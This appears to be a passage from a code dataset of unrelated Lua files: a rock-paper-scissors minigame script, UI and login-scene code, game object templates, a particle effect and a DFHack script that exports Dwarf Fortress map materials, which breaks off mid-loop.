content stringlengths 5 1.05M |
|---|
-- Custom
local propRoot = script:GetCustomProperty("root"):WaitForObject()
local propPlayerSpot1 = script:GetCustomProperty("PlayerSpot1"):WaitForObject()
local propPlayerSpot2 = script:GetCustomProperty("PlayerSpot2"):WaitForObject()
local propRPS_action_rock = script:GetCustomProperty("RPS_action_rock")
local propRPS_action_paper = script:GetCustomProperty("RPS_action_paper")
local propRPS_action_scissors = script:GetCustomProperty("RPS_action_scissors")
local propRPS_WorldIcon_Rock = script:GetCustomProperty("RPS_WorldIcon_Rock")
local propRPS_WorldIcon_Paper = script:GetCustomProperty("RPS_WorldIcon_Paper")
local propRPS_WorldIcon_Scissors = script:GetCustomProperty("RPS_WorldIcon_Scissors")
local propRPS_LoserExplosion = script:GetCustomProperty("RPS_LoserExplosion")
local TRIGGER = script:GetCustomProperty("Trigger"):WaitForObject() ---@type Trigger
local RESPAWN_POINT = script:GetCustomProperty("RespawnPoint"):WaitForObject() ---@type StaticMesh
local slotList = { propPlayerSpot1, propPlayerSpot2 }
local actions = {propRPS_action_rock, propRPS_action_paper, propRPS_action_scissors}
local popupIcons = {propRPS_WorldIcon_Rock, propRPS_WorldIcon_Paper, propRPS_WorldIcon_Scissors}
local playerList = {}
local STATE_GAME_NOT_STARTED = "game not started"
local STATE_WAITING_FOR_MOVES = "waiting for moves"
local STATE_DISPLAYING_OUTCOME = "displaying outcome"
local currentMatchState = STATE_GAME_NOT_STARTED
local selectionsReceived = 0
function GetPlayersInTrigger()
local result = {}
for k,v in pairs(Game.GetPlayers()) do
if TRIGGER:IsOverlapping(v) then
table.insert(result, v)
end
end
return result
end
function OnBeginOverlap(trigger, other)
if other:IsA("Player") and currentMatchState == STATE_GAME_NOT_STARTED then
local playersInZone = GetPlayersInTrigger()
print("There are currently", #playersInZone, "players in the trigger")
if #playersInZone >= 2 then
StartMatch(playersInZone[1].id, playersInZone[2].id)
end
end
end
function StartMatch(p1, p2)
selectionsReceived = 0
currentMatchState = STATE_WAITING_FOR_MOVES
print("match started:", p1, p2)
if p1 ~= nil then ConnectPlayer(Game.FindPlayer(p1), slotList[1]) end
if p2 ~= nil then ConnectPlayer(Game.FindPlayer(p2), slotList[2]) end
end
function SelectionMade(player, selection)
if playerList[player.id] == nil then return end
print("player", player.name, "selected", selection)
if playerList[player.id] == -1 then selectionsReceived = selectionsReceived + 1 end
playerList[player.id] = selection
print("selections received:", selectionsReceived)
if selectionsReceived >= 2 then
print("time for outcomes!")
currentMatchState = STATE_DISPLAYING_OUTCOME
Task.Spawn(DisplayMatchResults)
end
end
local STANCE = "unarmed_stance"
function DisplayMatchResults()
print("Match results!")
local spawnedActions = {}
local plist = {}
for pid, selection in pairs(playerList) do
local player = Game.FindPlayer(pid)
local action = World.SpawnAsset(actions[selection])
spawnedActions[pid] = action
action.owner = player
Task.Wait()
action:Activate()
local icon = World.SpawnAsset(popupIcons[selection], {position = player:GetWorldPosition()})
table.insert(plist, {player = player, pid = pid, selection = selection})
end
if #plist ~= 2 then
warn("Somehow resolving a match with wrong # of players:" .. tostring(#plist))
end
local s1 = plist[1].selection - 1
local s2 = plist[2].selection - 1
local winner = nil
local loser = nil
local isDraw = false
if s1 == (s2 + 1) % 3 then
winner = plist[1]
loser = plist[2]
elseif s2 == (s1 + 1) % 3 then
winner = plist[2]
loser = plist[1]
elseif s1 == s2 then
isDraw = true
else
warn("Somehow no one lost the match, but it also wasn't a draw??")
print(s1, s2)
end
Task.Wait(3)
if not isDraw then
Task.Wait(1)
World.SpawnAsset(propRPS_LoserExplosion, {position = loser.player:GetWorldPosition()})
DisconnectPlayer(plist[1].player)
DisconnectPlayer(plist[2].player)
loser.player:Die()
Task.Wait()
loser.player:SetVelocity(Vector3.New(math.random(-500, 500), math.random(-500, 500), 1000))
Task.Wait(3)
loser.player:Spawn()
-- This should be last for reasons.
-- (mostly because when we broadcast these, it will destroy this)
--Events.Broadcast("RPS_Result", winner.pid, 1)
--Events.Broadcast("RPS_Result", loser.pid, 0)
Events.Broadcast("RPS_Result", winner.pid, loser.pid)
print("Winner:", winner.player.name)
plist[1].player:SetWorldPosition(RESPAWN_POINT:GetWorldPosition())
plist[2].player:SetWorldPosition(RESPAWN_POINT:GetWorldPosition())
currentMatchState = STATE_GAME_NOT_STARTED
else
print("It was a draw!")
Task.Wait(2)
currentMatchState = STATE_WAITING_FOR_MOVES
StartMatch(plist[1].pid, plist[2].pid)
end
end
function ConnectPlayer(player, slot)
print("connecting player", player)
--bindListener = player.bindingPressedEvent:Connect(OnBindPressed)
--propTrigger.isEnabled = false
--player.serverUserData.blockFlying = true
playerList[player.id] = -1
player:SetWorldPosition(slot:GetWorldPosition())
player:SetWorldRotation(slot:GetWorldRotation())
--player:AttachToCoreObject(propPlayerAnchor)
local jumps = player.maxJumpCount
local movespeed = player.maxWalkSpeed
player.maxJumpCount = 0
player.maxWalkSpeed = 0
player:ActivateWalking()
player.canMount = false
--_G.StanceStack.Add(player, STANCE, script.id)
player.animationStance = STANCE
Events.BroadcastToPlayer(player, "RPS_SC")
end
function DisconnectPlayer(player)
if not Object.IsValid(player) then return end -- Player might have logged out.
playerList[player.id] = nil
player:Detach()
--_G.StanceStack.Remove(player, currentStance, script.id)
player.animationStance = "unarmed_stance"
player.canMount = true
player.maxJumpCount = 2
player.maxWalkSpeed = 800
end
function OnPlayerLeft(p)
if p == player then DisconnectPlayer() end
end
--Events.Connect("RPS_start_" .. propRoot:GetReference().id, StartMatch)
Events.ConnectForPlayer("RPS_C", SelectionMade)
print("RPS_start_" .. propRoot:GetReference().id)
Game.playerLeftEvent:Connect(OnPlayerLeft)
TRIGGER.beginOverlapEvent:Connect(OnBeginOverlap)
-----
|
local Class = require "Utils/Class"
local CtrlBase = require "UI/CtrlBase"
local Logger = require "Logger/Logger"
local UIConfig = require "Config/UIConfig"
local Ctrl = Class("Ctrl", CtrlBase)
local function __init(self, UIName)
self.uiName = UIName
end
local function __delete()
end
local function Init(self, UICtrl, ...)
if not _G.IsValid(UICtrl) then
Logger.warn("Ctrl:InitCtrl => UICtrl is nil")
return
end
self.bIsDeleted = false
local Widget = UICtrl:GetWidget()
self.Super:Init(Widget, ...)
end
local function Close(self)
if not _G.IsStringNullOrEmpty(self.uiName) then
_G.UIManager:Get():Remove(UIConfig[self.uiName])
end
end
Ctrl.__init = __init
Ctrl.__delete = __delete
Ctrl.Init = Init
Ctrl.Close = Close
return Ctrl
|
--
-- User: Glastis
-- Date: 15-Nov-19
--
local composer = require 'composer'
local mui = require 'materialui.mui'
local views = require 'views.common'
local utilitie = require 'common.utilities'
local widget = require 'widget'
local muiData = require 'materialui.mui-data'
views.set_active_view(3)
local background
local scene = composer.newScene()
local pass
local data
local function network_callback(event)
if (event.isError) then
print("Network error: ", event.response)
else
print("RESPONSE: " .. event.response)
end
end
local function get_token(email, pass)
local headers
headers = {}
headers["Content-Type"] = "application/json"
headers["Accept"] = "application/json"
network.request("https://new.glastis.com/auth/token", "POST", network_callback)
end
local function email_callback(data)
local muiTargetValue = mui.getEventParameter(data, "muiTargetValue")
utilitie.var_dump(muiTargetValue, true, 10)
utilitie.var_dump(data, true, 20)
end
local function pass_callback(data)
end
function scene:create(event)
local sceneGroup = self.view
mui.init()
local topInset, leftInset, bottomInset, rightInset = mui.getSafeAreaInsets()
views.create_background(mui, sceneGroup)
views.add_header(mui)
mui.newTextField({
parent = mui.getParent(),
name = "login_user",
labelText = "",
placeholder = "Courriel",
font = native.systemFont,
width = 200,
height = 26,
x = (display.contentWidth - (leftInset + rightInset)) / 2,
y = (display.contentHeight - (topInset + bottomInset)) / 2 - 40,
trimAtLength = 30,
fillColor = views.background_color,
activeColor = { 0, 0, 0, 1 },
inactiveColor = { 0.5, 0.5, 0.5, 1 },
callBack = email_callback
})
mui.newTextField({
parent = mui.getParent(),
name = "login_pass",
labelText = "",
placeholder = "Mot de passe",
text = "",
font = native.systemFont,
width = 200,
height = 26,
x = (display.contentWidth - (leftInset + rightInset)) / 2,
y = (display.contentHeight - (topInset + bottomInset)) / 2 + 10,
fillColor = views.background_color,
activeColor = { 0, 0, 0, 1 },
inactiveColor = { 0.5, 0.5, 0.5, 1 },
callBack = pass_callback
})
local showToast = function()
mui.newToast({
name = "login_status",
text = "Connexion en cours",
radius = 20,
width = 200,
height = 30,
font = native.systemFont,
fontSize = 18,
fillColor = { 0, 0, 0, 1 },
textColor = { 1, 1, 1, 1 },
top = 40 + muiData.safeAreaInsets.topInset,
easingIn = 500,
easingOut = 500,
callBack = pass_callback
})
get_token()
end
mui.newRoundedRectButton({
name = "login_submit",
text = "Connexion",
width = 150,
height = 30,
x = (display.contentWidth - (leftInset + rightInset)) / 2,
y = (display.contentHeight - (topInset + bottomInset)) / 2 + 80,
font = native.systemFont,
textColor = views.background_color,
fillColor = views.get_color_ratio(51, 153, 255),
radius = 10,
callBack = showToast
})
end
function scene:show(event)
local sceneGroup
local phase
sceneGroup = self.view
phase = event.phase
if ( phase == "will" ) then
-- Called when the scene is still off screen (but is about to come on screen)
elseif ( phase == "did" ) then
-- Called when the scene is now on screen
-- Insert code here to make the scene come alive
-- Example: start timers, begin animation, play audio, etc.
-- mui.actionSwitchScene({callBackData={sceneDestination="fun"}})
end
end
function scene:hide(event)
local sceneGroup
local phase
sceneGroup = self.view
phase = event.phase
if ( phase == "will" ) then
-- Called when the scene is on screen (but is about to go off screen)
-- Insert code here to "pause" the scene
-- Example: stop timers, stop animation, stop audio, etc.
elseif ( phase == "did" ) then
-- Called immediately after scene goes off screen
end
end
function scene:destroy( event )
local sceneGroup
sceneGroup = self.view
-- Called prior to the removal of scene's view
-- Insert code here to clean up the scene
-- Example: remove display objects, save state, etc.
mui.destroy()
if background ~= nil then
background:removeSelf()
background = nil
end
sceneGroup:removeSelf()
sceneGroup = nil
end
scene:addEventListener( "create", scene )
scene:addEventListener( "show", scene )
scene:addEventListener( "hide", scene )
scene:addEventListener( "destroy", scene )
return scene
|
propMonster = {
[MONSTER_ID_1] = { ID=1, Name="MONSTER 1", Desc="monster 1 desc" },
[MONSTER_ID_2] = { ID=2, Name="MONSTER 2", Desc="monster 2 desc" },
} |
local Wall = {}
function Wall.new(left, top, width, height)
local wall = {}
wall.x = left
wall.y = top
wall.w = width
wall.h = height
wall.vx = 0
wall.vy = 0
wall.color = {0, 0, 255}
wall.is_ground = true
wall.collision = {}
wall.static = true
return wall
end
return Wall |
object_tangible_furniture_city_road_torch_12x64_01 = object_tangible_furniture_city_shared_road_torch_12x64_01:new {
}
ObjectTemplates:addTemplate(object_tangible_furniture_city_road_torch_12x64_01, "object/tangible/furniture/city/road_torch_12x64_01.iff")
|
local m = {}
m.paths = require("red4ext/paths")
m.project = require("red4ext/project")
m.version = require("red4ext/version")
return m
|
/*---------------------------------------------------------
Initializes the effect. The data is a table of data
which was passed from the server.
---------------------------------------------------------*/
function EFFECT:Init( data )
self.Origin = data:GetOrigin()
self.DirVec = data:GetNormal()
self.Radius = data:GetRadius()
self.Emitter = ParticleEmitter( self.Origin )
end
/*---------------------------------------------------------
THINK
---------------------------------------------------------*/
function EFFECT:Think( )
for i=0, 2*self.Radius do
local Light = self.Emitter:Add( "sprites/light_glow02_add.vmt", self.Origin )
if (Light) then
Light:SetVelocity( Normal * math.random( 40,60*self.Radius) + VectorRand() * math.random( 25,50*self.Radius) )
Light:SetLifeTime( 0 )
Light:SetDieTime( math.Rand( 1 , 2 )*self.Radius/3 )
Light:SetStartAlpha( math.Rand( 50, 150 ) )
Light:SetEndAlpha( 0 )
Light:SetStartSize( 2.5*self.Scale )
Light:SetEndSize( 25*self.Radius )
Light:SetRoll( math.Rand(150, 360) )
Light:SetRollDelta( math.Rand(-2, 2) )
Light:SetAirResistance( 100 )
Light:SetGravity( Vector( math.random(-10,10)*self.Radius, math.random(-10,10)*self.Radius, 250 ) )
Light:SetColor( 170,140,90 )
end
end
end
/*---------------------------------------------------------
Draw the effect
---------------------------------------------------------*/
function EFFECT:Render()
end
|
--local let = require("vim_interfaces/vars").let
--let.g("SuperTabDefaultCompletionType", "<Down>")
|
--[[
MIT License
Copyright (c) 2018 Scott Bengs
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
]]
--[[
opal
=================
First version of script to pull data from DFHack
Huge shout out to Milo Christiansen and his script at https://github.com/DFHack/dfhack/blob/master/library/lua/tile-material.lua
It was used to speed up development greatly!
]]
OPAL_TileTypeMaterialTable =
{
[df.tiletype_material.NONE] = "aa", -- neg 1
[df.tiletype_material.AIR] = "aa", --0
[df.tiletype_material.SOIL] = 1, --1
[df.tiletype_material.STONE] = 1, --2
[df.tiletype_material.FEATURE] = "aa", --3
[df.tiletype_material.LAVA_STONE] = 2,
[df.tiletype_material.MINERAL] = 3,
[df.tiletype_material.FROZEN_LIQUID] = "ac",
[df.tiletype_material.CONSTRUCTION] = 1,
[df.tiletype_material.GRASS_LIGHT] = "ag", --8
[df.tiletype_material.GRASS_DARK] = "ah",
[df.tiletype_material.GRASS_DRY] = "ai",
[df.tiletype_material.GRASS_DEAD] = "aj",
[df.tiletype_material.PLANT] = 1,
[df.tiletype_material.HFS] = "aa",
[df.tiletype_material.CAMPFIRE] = 1,
[df.tiletype_material.FIRE] = "aa",
[df.tiletype_material.ASHES] = "aa",
[df.tiletype_material.MAGMA] = "aa", --17
[df.tiletype_material.DRIFTWOOD] = 1,
[df.tiletype_material.POOL] = "aa",
[df.tiletype_material.BROOK] = "aa",
[df.tiletype_material.RIVER] = "aa",
[df.tiletype_material.ROOT] = "ar",
[df.tiletype_material.TREE] = "at",
[df.tiletype_material.MUSHROOM] = 1,
[df.tiletype_material.UNDERWORLD_GATE] = "aa"
}
OPAL_InorganicMaterialNumberToString =
{
[34] = "onyx",
[35] = "morion",
[36] = "schorl",
[37] = "lace_agate",
[38] = "blue_jade",
[39] = "lapis_lazuli",
[40] = "prase",
[41] = "prase_opal",
[42] = "bloodstone",
[43] = "moss_agate",
[44] = "moss_opal",
[45] = "variscite",
[46] = "chrysoprase",
[47] = "chrysocolla",
[48] = "sard",
[49] = "carnelian",
[50] = "banded_agate",
[51] = "sardonyx",
[52] = "cherry_opal",
[53] = "lavender_jade",
[54] = "pink_jade",
[55] = "tube_agate",
[56] = "fire_agate",
[57] = "plume_agate",
[58] = "brown_jasper",
[59] = "picture_jasper",
[60] = "smoky_quartz",
[61] = "wax_opal",
[62] = "wood_opal",
[63] = "amber_opal",
[64] = "gold_opal",
[65] = "citrine",
[66] = "yellow_jasper",
[67] = "tigereye",
[68] = "tiger_iron",
[69] = "sunstone",
[70] = "resin_opal",
[71] = "pyrite",
[72] = "clear_tourmaline",
[73] = "gray_chalcedony",
[74] = "dendritic_agate",
[75] = "shell_opal",
[76] = "bone_opal",
[77] = "white_chalcedony",
[78] = "fortification_agate",
[79] = "milk_quartz",
[80] = "moonstone",
[81] = "white_jade",
[82] = "jasper_opal",
[83] = "pineapple_opal",
[84] = "onyx_opal",
[85] = "milk_opal",
[86] = "pipe_opal",
[87] = "aventurine",
[88] = "turquoise",
[89] = "rose_quartz",
[90] = "rock_crystal",
[91] = "black_zircon",
[92] = "black_pyrope",
[93] = "melanite",
[94] = "indigo_tourmaline",
[95] = "blue_garnet",
[96] = "tsavorite",
[97] = "green_tourmaline",
[98] = "demantoid",
[99] = "green_zircon",
[100] = "green_jade",
[101] = "heliodor",
[102] = "peridot",
[103] = "red_zircon",
[104] = "red_tourmaline",
[105] = "red_pyrope",
[106] = "almandine",
[107] = "red_grossular",
[108] = "pink_tourmaline",
[109] = "red_beryl",
[110] = "fire_opal",
[111] = "rhodolite",
[112] = "purple_spinel",
[113] = "alexandrite",
[114] = "tanzanite",
[115] = "morganite",
[116] = "violet_spessartine",
[117] = "pink_garnet",
[118] = "kunzite",
[119] = "cinnamon_grossular",
[120] = "honey_yellow_beryl",
[121] = "jelly_opal",
[122] = "brown_zircon",
[123] = "yellow_zircon",
[124] = "golden_beryl",
[125] = "yellow_spessartine",
[126] = "topaz",
[127] = "topazolite",
[128] = "yellow_grossular",
[129] = "rubicelle",
[130] = "clear_garnet",
[131] = "goshenite",
[132] = "cats_eye",
[133] = "clear_zircon",
[134] = "amethyst",
[135] = "aquamarine",
[136] = "red_spinel",
[137] = "chrysoberyl",
[138] = "pinfire_opal",
[139] = "red_flash_opal",
[140] = "black_opal",
[141] = "white_opal",
[142] = "crystal_opal",
[143] = "claro_opal",
[144] = "levin_opal",
[145] = "harlequin_opal",
[146] = "pinfire_opal",
[147] = "bandire_opal",
[148] = "light_yellow_diamond",
[149] = "faint_yellow_diamond",
[150] = "emerald",
[151] = "ruby",
[152] = "sapphire",
[153] = "clear_diamond",
[154] = "red_diamond",
[155] = "green_diamond",
[156] = "blue_diamond",
[157] = "yellow_diamond",
[158] = "black_diamond",
[159] = "star_sapphire",
[160] = "star_ruby",
[161] = "sandstone",
[162] = "siltstone",
[163] = "mudstone",
[164] = "shale",
[165] = "claystone",
[166] = "rock_salt",
[167] = "limestone",
[168] = "conglomerate",
[169] = "dolomite",
[170] = "chert",
[171] = "chalk",
[172] = "granite",
[173] = "diorite",
[174] = "gabbro",
[175] = "rhyolite",
[176] = "basalt",
[177] = "andesite",
[178] = "dacite",
[179] = "obsidian",
[180] = "quartzite",
[181] = "slate",
[182] = "phyllite",
[183] = "schist",
[184] = "gneiss",
[185] = "marble",
[186] = "hematite",
[187] = "limonite",
[188] = "garnierite",
[189] = "native_gold",
[190] = "native_silver",
[191] = "native_copper",
[192] = "malachite",
[193] = "galena",
[194] = "sphalerite",
[195] = "cassiterite",
[196] = "bituminous_coal",
[197] = "lignite",
[198] = "native_platinum",
[199] = "cinnabar",
[200] = "cobaltite",
[201] = "tetrahedrite",
[202] = "horn_silver",
[203] = "gypsum",
[204] = "talc",
[205] = "jet",
[206] = "puddingstone",
[207] = "petrified_wood",
[208] = "graphite",
[209] = "brimstone",
[210] = "kimberlite",
[211] = "bismuthinite",
[212] = "realgar",
[213] = "orpiment",
[214] = "stibnite",
[215] = "marcasite",
[216] = "sylvite",
[217] = "cryolite",
[218] = "periclase",
[219] = "llmenite",
[220] = "rutile",
[221] = "magnetite",
[222] = "chromite",
[223] = "pyrolusite",
[224] = "pitchblende",
[225] = "bauxite",
[226] = "native_aluminum",
[227] = "borax",
[228] = "olivine",
[229] = "hornblende",
[230] = "kaolinite",
[231] = "serpentine",
[232] = "orthoclase",
[233] = "microcline",
[234] = "mica",
[235] = "calcite",
[236] = "saltpeter",
[237] = "alabaster",
[238] = "selenite",
[239] = "satinspar",
[240] = "anhydrite",
[241] = "alunite",
[242] = "raw_adamantine",
[243] = "slade",
[244] = "clay",
[245] = "silty_clay",
[246] = "sandy_clay",
[247] = "clay_loam",
[248] = "sandy_clay_loam",
[249] = "silty_clay_loam",
[250] = "loam",
[251] = "sandy_loam",
[252] = "silt_loam",
[253] = "loamy_sand",
[254] = "silt",
[255] = "tan_sand",
[256] = "yellow_sand",
[257] = "white_sand",
[258] = "black_sand",
[259] = "red_sand",
[260] = "peat",
[261] = "pelagic_clay",
[262] = "calcareous_ooze",
[263] = "silliceous_ooze",
[264] = "fire_clay"
}
OPAL_TileTypeShapeTable =
{
[df.tiletype_shape.NONE] = "a", --0
[df.tiletype_shape.EMPTY] = "a", --0
[df.tiletype_shape.FLOOR] = "f",
[df.tiletype_shape.BOULDER] = "f",
[df.tiletype_shape.PEBBLES] = "f",
[df.tiletype_shape.WALL] = "w", --4
[df.tiletype_shape.FORTIFICATION] = "w",
[df.tiletype_shape.STAIR_UP] = "a",
[df.tiletype_shape.STAIR_DOWN ] = "a",
[df.tiletype_shape.STAIR_UPDOWN] = "a",
[df.tiletype_shape.RAMP] = "f",
[df.tiletype_shape.RAMP_TOP] = "a",
[df.tiletype_shape.BROOK_BED] = "w",
[df.tiletype_shape.BROOK_TOP] = "f",
[df.tiletype_shape.BRANCH] = "a",
[df.tiletype_shape.TRUNK_BRANCH] = "a",
[df.tiletype_shape.TWIG] = "a",
[df.tiletype_shape.SAPLING] = "f",
[df.tiletype_shape.SHRUB] = "f",
[df.tiletype_shape.ENDLESS_PIT] = "a"
}
OPAL_CharacterTable =
{
["a"] = "b", --give it the current letter and it will return the next one
["b"] = "c",
["c"] = "d",
["d"] = "e",
["e"] = "f",
["f"] = "g",
["g"] = "h",
["h"] = "i",
["i"] = "j",
["j"] = "k",
["k"] = "l",
["l"] = "m",
["m"] = "n",
["n"] = "o",
["o"] = "p",
["p"] = "q",
["q"] = "r",
["r"] = "s",
["s"] = "t",
["t"] = "u",
["u"] = "v",
["v"] = "w",
["w"] = "x",
["x"] = "y",
["y"] = "z",
["z"] = "A",
["A"] = "B",
["B"] = "C",
["C"] = "D",
["D"] = "E",
["E"] = "F",
["F"] = "G",
["G"] = "H",
["H"] = "I",
["I"] = "J",
["J"] = "K",
["K"] = "L",
["L"] = "M",
["M"] = "N",
["N"] = "O",
["O"] = "P",
["P"] = "Q",
["Q"] = "R",
["R"] = "S",
["S"] = "T",
["T"] = "U",
["U"] = "V",
["V"] = "W",
["W"] = "X",
["X"] = "Y",
["Y"] = "Z",
["Z"] = nil
}
OPAL_NaturalMaterialsTable =
{
["aa"] = "hidden", --defaults and test values
["ac"] = "ice",
["ag"] = "light_grass",
["ah"] = "dark_grass",
["ai"] = "dry_grass",
["aj"] = "dead_grass",
["ar"] = "root",
["at"] = "trunk"
}
--next_material_letter = "a"
--next_material_letter to next_material_sequence
--a_ are reserved for predefined materials like hidden
--aka aa, ab, az and so on
OPAL_next_material_sequence = "aZ"
OPAL_file = 0
OPAL_layer_write_count = 0
--end globals
local function materialLocation(table, material)
for key, value in pairs(table) do
if(value == material) then
return key
end
end
return nil --failed to find material
end
--get the next two char string for a material
local function getNextSequence()
local char_a = string.sub(OPAL_next_material_sequence, 1, 1)
local char_b = string.sub(OPAL_next_material_sequence, 2, 2)
char_b = OPAL_CharacterTable[char_b]
if char_b == nil then
char_a = OPAL_CharacterTable[char_a]
char_b = "a"
end
return char_a..char_b
end
local function addMaterial(type_index, material_index)
local name
local table
if type_index == 0 then
name = OPAL_InorganicMaterialNumberToString[material_index]
if name == nil then
print(dfhack.matinfo.decode(type_index, material_index))
error("unknown inorganic material index")
end
table = OPAL_NaturalMaterialsTable
else
error("unknown type index")
end
local sequence = materialLocation(table, name)
if sequence ~= nil then --we already have this material in the table so return the key
return sequence
else --make new key and add this material name to the table
OPAL_next_material_sequence = getNextSequence()
if OPAL_next_material_sequence == nil then
error("Next letter table returned nil. Bug or too many natural tile types")
end
table[OPAL_next_material_sequence] = name
return OPAL_next_material_sequence
end
end
--assumes that table is the top level cache
local function addBiomeLayers(table, biome)
local index = biome.index
local cache = table[index]
if cache == nil then
cache = {}
for key, layer in ipairs(table) do
cache[key] = addMaterial(0, layer.mat_index)
end
end
end
local function veinValue(flags)
if flags.cluster then
return 1
elseif flags.vein then
return 2
elseif flags.cluster_small then
return 3
elseif flags.cluster_one then
return 4
else
error("unknown vein flag")
end
end
local function getVeinMaterial(vein_cache, x, y) --vein cache table with all veins for this map block, full x and y value x_block * 16 + x and y_block * 16 + y
local tile_vein
local vein_value = 0
local saved_key
for key, vein in ipairs(vein_cache.veins) do
if dfhack.maps.getTileAssignment(vein.tile_bitmask, x, y) then
local temp = veinValue(vein.flags)
if temp >= vein_value then
vein_value = temp
tile_vein = vein
saved_key = key
end
end
end
if tile_vein == nil then
--error("Tile vein is nil at :"..x..", "..y)
return nil
end
local result = vein_cache.letters[saved_key]
if result == nil then
result = addMaterial(0, tile_vein.inorganic_mat)
vein_cache.letters[saved_key] = result
end
return result
end
local function writeHeader(version, width, height, length)
io.write(version.." "..width.." "..height.." "..length.."\n\n")
end
local function writeMaterialTable()
io.write("natural_materials\n")
for key, value in pairs(OPAL_NaturalMaterialsTable) do
io.write(key.." "..value.."\n")
end
io.write("natural_materials_end\n")
end
local function writeShapeTable()
io.write("natural_types\n")
io.write("a air\n")
io.write("w block\n")
io.write("f floor\n")
io.write("natural_types_end\n")
end
local function writeLayer(material, shape)
io.write(material.."\n")
io.write(shape.."\n")
OPAL_layer_write_count = OPAL_layer_write_count + 1
end
--assumes that table is the top level cache
local function addBiomeLayers(layer_cache, biome)
local index = biome.index
local cache = layer_cache[index]
if cache == nil then
layer_cache[index] = {}
cache = layer_cache[index]
for key, layer in ipairs(biome.layers) do
cache[key] = addMaterial(0, layer.mat_index)
end
end
end
local function addRegionXY(xy_cache, region_x, region_y, new_biome_index)
local table = xy_cache[region_x]
if table == nil then
xy_cache[region_x] = {}
end
local biome_index = xy_cache[region_x][region_y]
if biome_index == nil then
xy_cache[region_x][region_y] = new_biome_index
print("added new regions at x,y: "..region_x..","..region_y)
end
end
--without first check may get nil error. must check first table to see if nil and then can try the next layer
local function getBiomeIndex(xy_cache, region_x, region_y)
if xy_cache[region_x] == nil then
return nil
else
return xy_cache[region_x][region_y]
end
end
--safe way of grabbing the designations
local function getDesignations(block_cache, x_block, x, y)
if block_cache[x_block] == nil then
return nil
else
return block_cache[x_block].designation[x][y]
end
end
--add layers and lavastone for this biome index, and if new biome add region x and y
local function addBiome(xy_cache, layer_cache, lavastone_cache, region_x, region_y)
local biome_index = dfhack.maps.getRegionBiome(region_x, region_y).geo_index
addRegionXY(xy_cache, region_x, region_y, biome_index)
--same as above and below. if this cache returns a nil then add the layers/lavastone
local biome = layer_cache[biome_index]
if biome == nil then
biome = df.world_geo_biome.find(biome_index)
addBiomeLayers(layer_cache, biome)
end
local lava_stone = lavastone_cache[biome_index]
if lava_stone == nil then
local regions = df.global.world.world_data.region_details
for _, region in ipairs(regions) do
if region.pos.x == region_x and region.pos.y == region_y then
lavastone_cache[biome_index] = addMaterial(0, region.lava_stone)
break
end
end
end
end
local function main(filename)
--printall(OPAL_TileTypeMaterialTable)
local world_x, world_y, world_z
world_x, world_y, world_z = dfhack.maps.getTileSize()
print("world size x: "..world_x.." y: "..world_y.." z: "..world_z)
local block_x_count = world_x / 16 --blocks are 16x16x1 pieces of the map. Each embark tile is 3x3 of these
local block_y_count = world_y / 16
--caches
local block_cache = {} --hold a line of blocks to save looking them up multiple times
local vein_cache = {} -- same as block cache but this holds the veins for the current blocks and their material letter
local biome_xy_cache = {} --holds the region x and region y values we find. they are used to find region biome and the index to the actual biome. saves this index so we can look up in layer_cache
local biome_layer_cache = {} --hold all embark biome's layer letters. These already have their material known and added to the proper table. give the geolayer_index and it gives the letter
local biome_lava_stone_cache = {} --holds each embark biome's lava letter. give lava_stone to get the letter
local tile_type_shape_cache = {} --tile type value to shape letter
local tile_type_material_cache = {} --tile type value to material enum. These are contained in OPAL_TileTypeMaterialTable
--end caches
if filename == nil then
filename = "opal.txt"
end
print("saving to file named: "..filename)
OPAL_file = io.open(filename, "w")
io.output(OPAL_file)
--debug stuff
--world_z = 22
--end debug stuff
writeHeader("v0.15", world_x, world_z, world_y) --z and y need to be swapped for opal prospect
--setup caches
--per embark tile caches
--change to be biome caches instead. Add as we find them. region.geo_index is the same as the biome.index so use this as a unique id
--so have a table of [region x][region y] that contains the geolayer index, filled in as you find nils
--another table of each biome of this index, so geolayer_index of 10 means there is a biome with an index of 10. each biome has a lava stone, and a table of layers which can be turned into letters
--z shouldnt matter so run getTileBiomeRgn for each x and y at z of 0, and make the list of biomes from this. Then for each lava/layer needed later run just getTileBiomeRgn to see what biome index we need to pull from. can fill this in before
--the first run but make sure we can add more biomes later if a x,y,z returns one not found. getRegionBiome(regionx, regiony).geo_index has the unique id
--Reason for the change is that what biome each tile points to does not change on the 16x16x1 range. Can go 10 tiles to the right and then switch which biome they contain. causes nils when the biomes contain different number of layers
local tile_count = 0
--end setup caches
for z = 0, world_z - 1, 1 do --start at 0 and go until world_z - 1. changes here are just for testing such as starting at higher height
--set defaults
local wall_material_count = 0
local shape_count = 0
local current_wall_material = " "
local current_shape = " "
local wall_material_output = ""
local shape_output = ""
for y_block = block_y_count - 1, 0, -1 do
for index = 0, block_x_count - 1, 1 do
block_cache[index] = dfhack.maps.getBlock(index, y_block, z)
if block_cache[index] == nil then --found void map block
break
end
--block_cache[index] = dfhack.maps.ensureTileBlock(index, y_block, z)
vein_cache[index] = { ["veins"] = {}, ["letters"] = {} } --each map block two tables. one table of the vein events and one table of the letter for each. don't populate the letters unless they are accessed
--so vein 1(the start) would have a vein_cache[same x_block location].letters[1]. if this is nil it has not been accessed or added yet. vein 2 vein_cache[same x_block location].letters[2]
for _, event in ipairs(block_cache[index].block_events) do
if getmetatable(event) == "block_square_event_mineralst" then
table.insert(vein_cache[index].veins, event)
end
end
end
for y = 15, 0, -1 do
for x_block = 0, block_x_count - 1, 1 do
for x = 0, 15, 1 do
--check if hidden. if not get the shape and update tiletype to shape cache. then lookup material based on tiletype
--if block_cache returns nil then it is an empty block of all void
local designations = getDesignations(block_cache, x_block, x, y) --if nil assume void tiles
